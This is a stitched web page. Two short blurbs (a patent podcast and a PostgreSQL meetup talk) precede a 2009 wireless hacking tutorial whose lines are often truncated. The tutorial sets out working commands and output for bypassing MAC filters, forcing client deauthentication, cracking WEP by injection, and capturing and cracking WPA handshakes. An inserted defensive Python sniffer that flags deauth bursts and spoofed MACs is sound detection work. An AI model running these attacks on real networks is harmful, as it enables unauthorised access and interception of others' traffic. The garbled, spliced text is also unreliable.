Is your patent simply a transactional cost and a large pile of legal bills for your startup? Or is it a leverageable asset worthy of attracting precious investment dollars, worth its cost in multiples of valuation? The difference is often quality.
Is your patent application only good enough to get through the examination process? Or has it been crafted to stand the tests of time and varied audiences if you later need to assert that document against an infringer, find yourself litigating with it in an Article 3 Court at the hands of a judge and jury, God forbid, end up having to defend its validity at the PTAB, or even needing to use it to block pirated imports at the International Trade Commission? The difference is often quality.
Quality will be our focus for a good chunk of the remainder of this season. What goes into a quality patent, and where possible, how do you get it without breaking the bank?
** Episode Overview **
In this first episode of our quality series, Kristen Hansen and the panel discuss:
⦿ What do we mean when we say patent quality?
⦿ Why is patent quality important?
⦿ How to balance quality and budget
⦿ The importance of searching, continuations, and draftsperson domain expertise
⦿ Very practical tips, tricks, examples, and Kristen’s Musts for drafting quality applications
https://www.aurorapatents.com/patently-strategic-podcast.html
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsMydbops
This presentation, delivered at the Postgres Bangalore (PGBLR) Meetup-2 on June 29th, 2024, dives deep into connection pooling for PostgreSQL databases. Aakash M, a PostgreSQL Tech Lead at Mydbops, explores the challenges of managing numerous connections and explains how connection pooling optimizes performance and resource utilization.
Key Takeaways:
* Understand why connection pooling is essential for high-traffic applications
* Explore various connection poolers available for PostgreSQL, including pgbouncer
* Learn the configuration options and functionalities of pgbouncer
* Discover best practices for monitoring and troubleshooting connection pooling setups
* Gain insights into real-world use cases and considerations for production environments
This presentation is ideal for:
* Database administrators (DBAs)
* Developers working with PostgreSQL
* DevOps engineers
* Anyone interested in optimizing PostgreSQL performance
Contact info@mydbops.com for PostgreSQL Managed, Consulting and Remote DBA Services
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Wi-Foo Ninjitsu Exploitation
1. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
Wi-Foo Ninjitsu Exploitation
|=--------------------------------------------------------------------=|
|=----------------=[ Wi-Foo Ninjitsu Exploitation ]=---------------=|
|=-----------------------=[ 24 February 2009 ]=-----------------------=|
|=---------------------=[ By CWH Underground ]=---------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : Wi-Foo Ninjitsu Exploitation
Author : JabAv0C && ZeQ3uL
Team : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-02-24
##########
Contents
##########
[0x00] - Introduction
[0x01] - Security of Wireless network
[0x02] - Breaking the Simple Defenses
[0x02a] - Mac Filtering
[0x02b] - Discover Hidden SSID
[0x02c] - Sniffing informations on the Air
[0x03] - Get closer with cracking tool
[0x03a] - Aircrack-ng suite
[0x03b] - Decrypt packet with airdecap-ng
[0x03c] - Decloak packet with airdecloak-ng
[0x03d] - AirCracking 101
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
[0x04a] - Capturing method
[0x04b] - Cracking method
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
[0x05a] - Monitor Mode
[0x05b] - Fake Authentication
[0x05c] - Arp Replay Attack
[0x05d] - Fragmentation Attack
[0x05e] - Korek ChopChop Attack
[0x05f] - Packetforge
[0x05g] - ARP Request Replay with Interactive Attack
[0x05h] - Cracking WEP Key
[0x06] - Conclusion steps for cracking WEP
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
[0x09] - Exploiting CISCO LEAP
[0x10] - Mass Exploit with Karmetasploit
[0x11] - References
[0x12] - Greetz To
#######################
[0x00] - Introduction
#######################
This paper introduces practical techniques used by hackers to break wireless security.
We recommend that the reader has basic knowledge of wireless operation.
This paper contains 13 sections, but the practical content is in 10 of them, from 0x02 to 0x10.
Section 0x02 covers basic attacks on wireless networks. Section 0x03 describes the
tools used throughout this tutorial. Sections 0x04, 0x05 and 0x06 explain how to crack WEP.
Sections 0x07, 0x08 and 0x09 detail cracking WPA and WPA2. Section 0x10 covers
using Metasploit on a wireless network through a rogue AP.
#######################################
[0x01] - Security of Wireless Network
1 of 12 12/24/10 5:48 PM
#######################################
A wireless network has a serious drawback compared with a wired network because it uses the air as its medium. So, hackers are capab
by using a man-in-the-middle method or others.
Therefore, security in wireless networks is a major concern, and until now the wireless security standards can be divided as follows:
- WEP
- WPA-PSK
- WPA2-PSK
- WPA-802.1x
- WPA2-802.1x
WEP is the original security standard for wireless networks, but it is cracked easily. WPA and WPA2 were offered to increase
and solve the vulnerabilities in WEP. WPA and WPA2 are also divided into Pre-shared Key and 802.1x modes, which are used for personal and
respectively. In addition to these standards, there are other mechanisms to enhance wireless security, such as hidden SSID, MAC fi
talk about hacking these security standards and mechanisms in this tutorial and also provide other attacking methods which hacker
wireless network.
#######################################
[0x02] - Breaking the Simple Defenses
#######################################
++++++++++++++++++++++++++++++++
[0x02a] - Bypass Mac Filtering
++++++++++++++++++++++++++++++++
This is a basic security method: the access point stores the MAC addresses of legitimate clients. When there is an authen
to the access point, the access point compares the requesting MAC address with the MAC addresses stored in its memory. If the result
the authentication succeeds; otherwise it fails. However, this method is easy to bypass: the attacker only has to change
We have a case study of a MAC filtering bypass attack. One day, we had a chance to do a wireless penetration t
First, we used Kismet to discover the access points around the company. This let us know the exact location of each access
by fixing the channel for capturing packets. Fixing the target channel improves the efficiency of airodump-ng. We knew from air
that the access point used open authentication and did not use any encryption. So, we tried to connect to the access point, but
our authentication request. We concluded that this network used MAC filtering. From airodump-ng, we saw that there were clien
We immediately changed our MAC address to match the associated client's and tried to connect again. This time, everything
Moreover, we were able to access the internal network of this company and run any tools, such as nmap, Nessus and exploits, against
++++++++++++++++++++++++++++++++
[0x02b] - Discover Hidden SSID
++++++++++++++++++++++++++++++++
In some environments, the wireless administrator configures a hidden SSID. So, the attacker cannot know the SSID of the network
and also cannot connect to it. In airodump-ng, it shows <length: ?> where ? is the length of the SSID.
The only way to know the SSID name is from the association request. This packet occurs when a legitimate client conne
We are able to force a legitimate client to re-connect to the access point by sending a de-authentication packet to the client b
The command for doing that is like this:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
After sending the de-authentication packet to the client, the client will re-authenticate and re-associate.
Airodump-ng can detect this process and learn the SSID of this network.
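Both tricks in 0x02a and 0x02b leave traces in the air that a monitor-mode sensor can flag: a directed de-authentication burst, and one MAC address being driven by two radios with unrelated 802.11 sequence counters. The Python below is an added example written for this page, not code from the paper or from aircrack-ng; the frame records, field names and thresholds are constructed, and a real sensor would fill them from a capture.

```python
"""Minimal wireless-IDS heuristics over 802.11 frame metadata (added example).

Two detections, seen from the defender's side of sections 0x02a/0x02b:
  1. deauth_bursts: many deauthentication frames aimed at one client in a
     short window (aireplay-ng -0 sends 64 per shot; real APs send singles);
  2. spoofed_macs: a source MAC whose sequence counter jumps around, the
     fingerprint of a second NIC reusing a legitimate client's address.
All frames below are constructed; thresholds are illustrative, not tuned.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple

SEQ_MODULUS = 4096  # the Sequence Control field carries a 12-bit counter


@dataclass(frozen=True)
class Frame:
    ts: float    # capture timestamp in seconds
    ftype: str   # "beacon", "data" or "deauth" (simplified frame typing)
    src: str     # transmitter MAC (Address 2)
    dst: str     # receiver MAC (Address 1)
    seq: int     # 12-bit sequence number


def deauth_bursts(frames: Iterable[Frame], window: float = 2.0,
                  threshold: int = 10) -> Dict[Tuple[str, str], int]:
    """Map (src, dst) -> peak number of deauth frames within any `window`
    seconds, for pairs whose peak exceeds `threshold`."""
    stamps: Dict[Tuple[str, str], List[float]] = defaultdict(list)
    for f in frames:
        if f.ftype == "deauth":
            stamps[(f.src, f.dst)].append(f.ts)
    alerts: Dict[Tuple[str, str], int] = {}
    for pair, ts_list in stamps.items():
        ts_list.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(ts_list):          # sliding window count
            while t - ts_list[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak > threshold:
            alerts[pair] = peak
    return alerts


def spoofed_macs(frames: Iterable[Frame], max_gap: int = 64,
                 min_anomalies: int = 2) -> Set[str]:
    """Source MACs whose sequence counter moves by more than `max_gap`
    (mod 4096) at least `min_anomalies` times. One NIC increments by one per
    frame (small gaps only where the sensor missed frames); two NICs sharing
    a MAC produce interleaved counters that jump back and forth. Forged
    deauths carrying the AP's address trip the same check for the AP."""
    last: Dict[str, int] = {}
    anomalies: Dict[str, int] = defaultdict(int)
    for f in sorted(frames, key=lambda x: x.ts):
        if f.src in last:
            forward = (f.seq - last[f.src]) % SEQ_MODULUS
            if forward > max_gap:
                anomalies[f.src] += 1
        last[f.src] = f.seq
    return {mac for mac, n in anomalies.items() if n >= min_anomalies}


# --- constructed sample capture (not real traffic) ---
AP, CLIENT, OTHER = "aa:aa:aa:aa:aa:aa", "cc:cc:cc:cc:cc:cc", "dd:dd:dd:dd:dd:dd"
BCAST = "ff:ff:ff:ff:ff:ff"


def _sample() -> List[Frame]:
    fr: List[Frame] = []
    for k in range(9):                       # AP beacons, counter 200..208
        fr.append(Frame(k + 0.5, "beacon", AP, BCAST, 200 + k))
    fr.append(Frame(9.0, "deauth", AP, OTHER, 209))   # one benign deauth
    fr.append(Frame(9.5, "beacon", AP, BCAST, 210))
    for k in range(10):                      # legitimate client, counter 100..
        fr.append(Frame(k * 0.2, "data", CLIENT, AP, 100 + k))
    for k in range(5):                       # second radio using CLIENT's MAC
        fr.append(Frame(0.1 + k * 0.4, "data", CLIENT, AP, 3000 + k))
    for k in range(10):                      # OTHER: one missed frame, benign
        fr.append(Frame(2.0 + k * 0.1, "data", OTHER, AP, 10 + (k if k < 5 else k + 1)))
    for k in range(64):                      # forged burst "from" AP to CLIENT
        fr.append(Frame(5.0 + k * 0.001, "deauth", AP, CLIENT, 1 + k))
    return fr


SAMPLE_FRAMES = _sample()

if __name__ == "__main__":
    print("deauth bursts:", deauth_bursts(SAMPLE_FRAMES))
    print("spoofed MACs :", sorted(spoofed_macs(SAMPLE_FRAMES)))
```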
++++++++++++++++++++++++++++++++++++++++++++
[0x02c] - Sniffing informations on the Air
++++++++++++++++++++++++++++++++++++++++++++
This topic does not use any advanced technique or deep knowledge. Many wireless networks use open authentication wi
encryption mechanism. The attacker only needs to sniff packets from the air and find the credentials of protoco
telnet, ftp etc. These protocols do not have any encryption. So, we can find the username and password just by looking at the ca
We are able to sniff other data by using airodump-ng.
###########################################
[0x03] - Get closer with cracking tool
###########################################
We recommend using Aircrack-ng. Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once
have been captured. It implements the standard FMS attack along with some optimizations like the KoreK attacks, as well as the all-new
thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wirel
+++++++++++++++++++++++++++++
[0x03a] - Aircrack-ng suite
+++++++++++++++++++++++++++++
There are four tools in aircrack-ng suite which play an important role in this tutorial.
- airodump-ng: used for capturing packets
Use airodump-ng first every time in order to open monitor mode, which also enables the injection capability of our card
- aireplay-ng: used for injection
o de-authentication: used to send de-authentication packets to an associated client
o fake authentication: used to perform the fake authentication process
o interactive packet replay: used to choose the preferred packet to perform a replay attack
o arp replay: used to perform the ARP replay attack automatically
o Korek chopchop: used to generate a keystream by using the chopchop technique
o fragment: used to generate a keystream by using the fragmentation technique
- packetforge-ng: used to create packets
- aircrack-ng: used to recover the key
More detail: http://aircrack-ng.org/doku.php#aircrack-ng_suite1
+++++++++++++++++++++++++++++++++++++++++++
[0x03b] - Decrypt packet with airdecap-ng
+++++++++++++++++++++++++++++++++++++++++++
After we have the WEP or WPA key, sometimes we want to decrypt the captured packets. The Aircrack team has already
provided a tool for doing that, called "airdecap-ng". Examples of using airdecap-ng:
#airdecap-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
or
#airdecap-ng -e Workshop workshop-02.cap
The output from these commands is a file ending with "-dec.cap".
PS. For WPA, airdecap-ng returns a successful result only for files which contain the four-way handshake.
+++++++++++++++++++++++++++++++++++++++++++++
[0x03c] - Decloak packet with airdecloak-ng
+++++++++++++++++++++++++++++++++++++++++++++
Cloaking is a technique to disrupt the WEP key cracking process. It is done by injecting packets which are
to the network; these packets are called "chaff". If the attacker captures these packets and runs the cracking, the result wil
returned. However, the Aircrack team developed a tool to deal with this technique, called "airdecloak-ng".
#airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap
This command returns two files:
- workshop-01-filtered.cap: contains the filtered packets from the specified BSSID
- workshop-01-cloaked.cap: contains the cloaked packets from the specified BSSID
++++++++++++++++++++++++++++
[0x03d] - AirCracking 101
++++++++++++++++++++++++++++
PTW Attack (-z)
(aircrack-ng -z capture.cap): only works for WEP 64/128 bits and requires ARP request/reply packets that you mu
Dictionary Attack (WPA/WPA2 passphrases)
(aircrack-ng -w pass.lst *.cap)
Fudge Attack (-f)
Once you hit 2 million IVs, try the fudge factor "-f 4". Retry, increasing the fudge factor by adding 4 to it
** All the while, keep collecting data. Remember the golden rule: "The More IVs the Better"
#################################################################
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
#################################################################
WEP is practically a dead method for protecting a network from unauthorized access. There are several means to crack WEP k
First of all, we should prepare a device which supports monitor mode and can inject packets into the network.
After that we prepare the cracking tools; I chose aircrack-ng on BT3 final in VMware.
Ok, let's be clear about the concept of cracking WEP.
The main idea is to collect as many encrypted packets as fast as we can and then use these packets to crack the W
So, there are two situations arising from the above idea.
1. The network has high traffic.
2. The network has low traffic.
What is the difference between them?
Of course, in the first case we only use airodump to collect packets and crack the key, but in the second case
we have to inject packets in order to capture more packets. We introduce, first, the capturing and cracking method.
Then we talk about the injection method, which is needed only on a low-traffic network.
++++++++++++++++++++++++++++
[0x04a] - Capturing method
++++++++++++++++++++++++++++
First, we introduce the way to collect packets. For a 64-bit WEP key we use about 50,000 IV packets, and
about 150,000 IV packets for a 128-bit WEP key.
The command for collecting packets is
#airodump-ng -w workshop rausb0
3 of 12 12/24/10 5:48 PM
4. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
------------------------------------------------------------------------------------------
[ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
xx:xx:xx:xx:xx:xx 77 94 10905 11054 0 11 54. WEP WEP OPN Workshop
BSSID STATION PWR Rate Lost Packets Probes
xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy 85 54-54 0 7747
------------------------------------------------------------------------------------------
We will get the file "workshop-01.cap", used for cracking the key later.
We can determine the number of packets from the data field; around 90% of the packets shown in the data field are our required IV p
+++++++++++++++++++++++++++
[0x04b] - Cracking method
+++++++++++++++++++++++++++
After we have collected enough encrypted packets (IV packets), we use aircrack-ng to recover the key.
#aircrack-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
-b xx:xx:xx:xx:xx:xx is the MAC address of the target access point
A successful cracking result looks like the following:
---------------------------------------------------------------
Opening workshop-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
#########################################################################
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
#########################################################################
This method is not necessary on a high-traffic network, but it is very important on a low-traffic network. The idea behind this
we have to inject a packet to force the access point to generate a new packet back to the client. The new packet contains a new IV.
If we think carefully about the above idea, the source MAC address must be associated, the packet must be sent from the client to the acc
and the packet must cause the access point to produce a response or another packet; normally we should use the packet which has broa
We can summarise the requirements for the packet chosen for injection as follows.
- The source MAC address is associated with the access point (we can achieve this by fake authentication).
- It is sent from client to access point (the "To DS" flag is set to 1).
- The destination MAC address is broadcast (FF:FF:FF:FF:FF:FF).
The well-known packet which covers all requirements is the ARP request broadcast. In the aircrack-ng suite, there is aireplay-
- The network has ARP requests.
- The network has no ARP requests.
No matter which case we are faced with, the important thing to realise is that we have to perform injection with an associa
Now, we have two choices. The first is to change our MAC address to the associated MAC address; the second is to do fake authenti
++++++++++++++++++++++++
[0x05a] - Monitor Mode
++++++++++++++++++++++++
Use airmon-ng to put your Wi-Fi card into monitor mode and prepare it for packet injection.
#airmon-ng start wlan0 11
This sets wlan0 to monitor mode on channel 11. We must specify the same channel as the target AP.
+++++++++++++++++++++++++++++++
[0x05b] - Fake Authentication
+++++++++++++++++++++++++++++++
We can do fake authentication with the following command.
#aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
-a xx:xx:xx:xx:xx:xx is the MAC address of the access point
-h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card
If the result is successful, our MAC address is associated with that access point.
A successful result looks like:
------------------------------------------
00:00:00 Sending Authentication Request
00:00:00 Authentication successful
00:00:00 Sending Association Request
00:00:00 Association successful :-)
------------------------------------------
After succeeding in fake authentication, we have to determine what type of network we are faced with and pick the appropri
+++++++++++++++++++++++++++++
[0x05c] - Arp Replay Attack
+++++++++++++++++++++++++++++
We can run the ARP replay attack with the following command.
#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
-b xx:xx:xx:xx:xx:xx is the MAC address of the access point
-h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card
Aireplay-ng will detect ARP requests and use them to perform the replay attack automatically.
The output will look like the following once it finds an ARP request.
------------------------------------------------------------------------------------
21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-0223-210620.cap
You should also start airodump-ng to capture replies.
Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
------------------------------------------------------------------------------------
** In some cases, no ARP request is broadcast from the access point, so we cannot use the normal ARP replay attac
We have to obtain a key stream from a captured packet, use the key stream to forge an ARP request packet and then replay it to
in order to generate new IV packets. There are two ways to obtain a key stream, called the "chopchop attack" and the "fragme
Both methods can be performed with aireplay-ng.
++++++++++++++++++++++++++++++++
[0x05d] - Fragmentation Attack
++++++++++++++++++++++++++++++++
The fragmentation attack is used to obtain a key stream of 1500 bytes, so we can use this key stream to create a
which has a size of up to 1500 bytes. The command for the fragmentation attack is
#aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
The system responds with this:
-------------------------------------------------------------------------------
21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
21:21:07 Waiting for a data packet...
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r
0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8*
0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c
0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z
0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z.
Use this packet ?
-------------------------------------------------------------------------------
We have to answer "y"
-----------------------
Use this packet ? y
-----------------------
And the successful process looks like this:
----------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-212107.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0223-212107.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
----------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++
[0x05e] - Korek ChopChop Attack
+++++++++++++++++++++++++++++++++
There is a guy called KoreK who developed a tricky attack method called chopchop. It requires only one encrypte
to obtain the key stream, which is then used to generate an ARP request packet and finally perform the ARP replay attack.
We can use the chopchop attack with this command.
#aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
Aireplay-ng will pick a packet to decrypt. We can choose any packet whose BSSID matches our target.
The response from the command looks like this:
--------------------------------------------------------------------------------------
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K....
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
0x0050: b09b f0f1 8b04 fc1c 0b72 .........r
Use this packet ?
----------------------------------------------------------------------------------------
And we answer by typing "y" like this
---------------------
Use this packet ? y
---------------------
Then the system does the decryption
---------------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-211242.cap
Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms
Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms
Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms
Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms
Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms
The AP appears to drop packets shorter than 37 bytes.
Enabling standard workaround: IP header re-creation.
This doesn't look like an IP packet, try another one.
Warning: ICV checksum verification FAILED! Trying workaround.
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
Saving plaintext in replay_dec-0223-211410.cap
Saving keystream in replay_dec-0223-211410.xor
Completed in 21s (2.48 bytes/s)
---------------------------------------------------------------------------------------
The result of this process is an .xor file and a .cap file. The .xor file contains the key stream and the .cap file contains the decrypted packet
+++++++++++++++++++++++
[0x05f] - Packetforge
+++++++++++++++++++++++
Create an encrypted packet from the PRGA (XOR file) obtained from chopchop or the fragmentation attack.
#packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy -k 255.255.255.255 -l 255.255.255.255 -y re
The result is:
----------------------
Wrote packet to: arp
----------------------
From this command, we get an ARP request packet in a file named "arp".
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x05g] - ARP Request Replay with Interactive Attack
++++++++++++++++++++++++++++++++++++++++++++++++++++++
We use aireplay-ng to inject the ARP request packet towards the access point with the following command.
#aireplay-ng -2 -r arp rausb0
The response will look like:
-----------------------------------------------------------------------------------
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:27:C0:07:71
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l;
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~
0x0040: 66bf 700e f.p.
Use this packet ?
-----------------------------------------------------------------------------------
We have to answer "y"
---------------------
Use this packet ? y
---------------------
aireplay-ng starts injecting the packet.
-------------------------------------------------------
Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.
Sent 1200 packets...(499 pps)
-------------------------------------------------------
++++++++++++++++++++++++++++
[0x05h] - Cracking WEP Key
++++++++++++++++++++++++++++
After we have collected enough encrypted packets (IV packets), we use aircrack-ng to recover the key.
#aircrack-ng -z capture1.cap (PTW attack)
A successful cracking result looks like the following:
---------------------------------------------------------------
Opening capture1.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
##############################################
[0x06] - Conclusion Scripts for Cracking WEP
##############################################
Note: $AP is the access point MAC address
$WIFI is the Wi-Fi card MAC address
- airmon-ng start wlan0 11 (must specify the channel for monitor mode)
- airodump-ng -c 11 -w capture1.cap wlan0
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
- aireplay-ng -4 -b $AP -h $WIFI wlan0
If it does not work, try #aireplay-ng -5 -b $AP -h $WIFI wlan0
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request
- aireplay-ng -2 -r arp-request wlan0
- aircrack-ng -z capture1.cap
** These methods can be used to crack WEP on a clientless network.
#########################################
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
#########################################
PSK stands for Pre-Shared Key. This mechanism was introduced to fix the WEP vulnerabilities,
so the key cannot be cracked the same way as WEP. The only way to recover a WPA-PSK or WPA2-PSK key is to capture the
four-way handshake and crack it with a dictionary attack.
The idea for cracking the pre-shared key is to gather the four-way handshake packets. We can do this by de-authenticating an as
This will force the client to re-authenticate, and we can get the four-way handshake from that process. The command for
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
We assume that we captured this process in the workshop-02.cap file. So, we perform the cracking using aircrack-ng.
#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap
